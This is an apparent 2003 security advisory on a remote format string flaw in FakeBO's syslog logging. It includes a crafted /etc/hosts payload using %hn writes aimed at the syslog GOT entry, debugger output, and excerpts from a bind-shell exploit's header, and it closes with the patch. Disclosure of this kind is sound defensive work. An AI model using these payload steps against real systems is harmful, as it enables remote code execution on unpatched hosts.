SRT2003-06-12-1212 - FakeBO syslog() format string issue.

[KF <dotslash () snosoft com>]

http://www.secnetops.biz/research

Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research () secnetops com
Team Lead Contact                                 kf () secnetops com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-06-12-1212
Product                 : FakeBO server
Version                 : <= 0.4.1
Vendor                  : http://sourceforge.net/projects/fakebo/
Class                   : Remote
Criticality             : Low
Operating System(s)     : *nix, cygwin


High Level Explanation
************************************************************************
High Level Description  : Remote format string issue in syslogprintf()
What to do              : Apply patch or disable syslog in the config


Technical Details
************************************************************************
Proof Of Concept Status : Secure Network Operations does have PoC code
Low Level Description   : 

FakeBO could be considered a novelty program by now however in some 
situations there is potential that it could be used in some sort of 
novice honeypot type setup. It is also possible someone would think it 
was a good way to trick their office buddy that had installed the REAL BO 
on their PC earlier that week. Someone mentioned the possiblilty of this
being used in a crude backdoor as well. 

Both cygwin binaries and unix source are available from the FakeBO website
located at http://cvs.linux.hr/fakebo/. This issue can be triggered in 
both the linux and win32 versions. In order to be exploitable FakeBO must 
first be configured to use syslog() and the target must have the proper 
resolver library in place. Syslog could be turned on in the fakebo.conf as 
follows.

# you can set this to 1 if you want to log connections via syslog
# 0 - do not log via syslog
# 1 - log via syslog
# 2 - log via syslog verbosely
logtosyslog 1

Due to possible resolver issues the chances of this bug being actively
exploited are slim. The issues with the resolver can be explained at 
http://pi.cr.yp.to/ and http://cr.yp.to/djbdns/idn.html. If your bind 
allows the allow_special all or options no-check-names in /etc/resolv.conf 
you may be able to be exploited. In order to show the posibility for 
exploitation you simply use /etc/hosts as an example.

This is the entry in /etc/hosts 
127.0.0.1               ..AAAABBBB%10$x%11$x

If we only make use of the console we would see this

04-09-2003 15:37:18 [NB] Connection[#0] from `..AAAABBBB%10$x%11$x' 
(127.0.0.1) accepted!

In syslog however we get more interesting output. 

Apr  9 15:37:18 vegeta FakeBO: 
[NB] Connection[#0] from `..AAAABBBB4141414142424242' (127.0.0.1)

This would be an example of overwriting the syslog() function in order 
to exploit this issue. 

[dotslash@vegeta dotslash]$ objdump -R fakebo-0.4.1/fakebo|grep syslog
08051cd4 R_386_JUMP_SLOT   syslog

[root@vegeta dotslash]#  echo -e "127.0.0.1 ..\xd6\x1c\x05\x08\xd4\x1c
\x05\x08%10\$hn%11\$hn" > /etc/hosts

(gdb) r -c /tmp/fakebo.conf
Starting program: ~/fakebo-0.4.1/fakebo -c /tmp/fakebo.conf
FakeBO  version 0.4.1  Copyright (C) 1998,99 by KoSt
 
Type `~/fakebo-0.4.1/fakebo -a' for details.
 
04-09-2003 19:48:06 FakeBO 0.4.1 started using PID 2591.
04-09-2003 19:48:25 [NB] Connection[#0] from `..??%10$hn%11$hn' 
(127.0.0.1) accepted!
04-09-2003 19:48:43 [NB][#0] Client disconnected.
 
Program received signal SIGSEGV, Segmentation fault.
0x00240024 in ?? ()

If you wanted to take this simple example to the extreme...

[dotslash@vegeta dotslash]$ head 0x82-fakebo_sux.c
/*
** FakeBO v0.4.1 Proof of Concept exploit
** exploit by "you dong-hun"(Xpl017Elz), <szoahc () hotmail com>.
**
** bash-2.04# ./0x82-fakebo_sux -t1
**  [1] Make format string code.
**  [2] Try localhost NetBUS port.
**  [3] Make bind shellcode.
**  [+] Waiting, execute shell.
**  [*] Executed shell successfully !
**
** Linux testsub 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys),
** 4(adm),6(disk),10(wheel)
** bash-2.04$
**
*/

When being attacked in syslog you would see the following. 

** 05-31-2003 18:48:55 FakeBO 0.4.1 started using PID 6996.
** 05-31-2003 18:49:05 [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn' 
(127.0.0.1) accepted!
** 05-31-2003 18:49:06 [NB](#0):  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...

If however you were using an Immunix box (http://www.immunix.org) you would 
see the following. 

[root@Immunity kf]# ./0x82-fakebo_sux -t1
 [1] Make format string code.
 [2] Try localhost NetBUS port.
 [3] Make bind shellcode.
Broken pipe

Note we did not get a shell... that would be FormatGuard working its magic. 

fakebo[6467]: ImmunixOS format error - mismatch of 0 in syslog() called by 
syslogprintf.

Cheers go to the Immunix team for their work on the FormatGuard product. 

Patch or Workaround: 
Shortly after exploiting this issue on a non Immunix system I looked around 
to make sure this had not already been published. It turns out that someone 
on the FreeBSD team also noticed this sometime last year and wrote a patch. 

Fri Jun 7 01:16:21 2002 UTC (12 months ago) by kris
- Fix a format string vulnerability which appears to be exploitable, and
bump PORTREVISION.

--- misc.c.orig Thu Jun  6 18:11:32 2002
+++ misc.c      Thu Jun  6 18:11:41 2002
@@ -107,7 +107,7 @@

 #ifdef HAVE_OPENLOG
                openlog("FakeBO", LOG_CONS, LOG_USER);
-               syslog(LOG_WARNING, buf);
+               syslog(LOG_WARNING, "%s", buf);
                closelog();
 #else
 #warning "Can't find usable syslog, disabled!"


Vendor Status   : Vlatko Kosturjak aka KoSt was notified about the issue
no updates to the sourceforge site or original home page have been made. 
A recompiled cygwin binary is not available from the Author at this time. 

Bugtraq URL     : to be assigned 

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research () secnetops com for information on how
to obtain exploit information.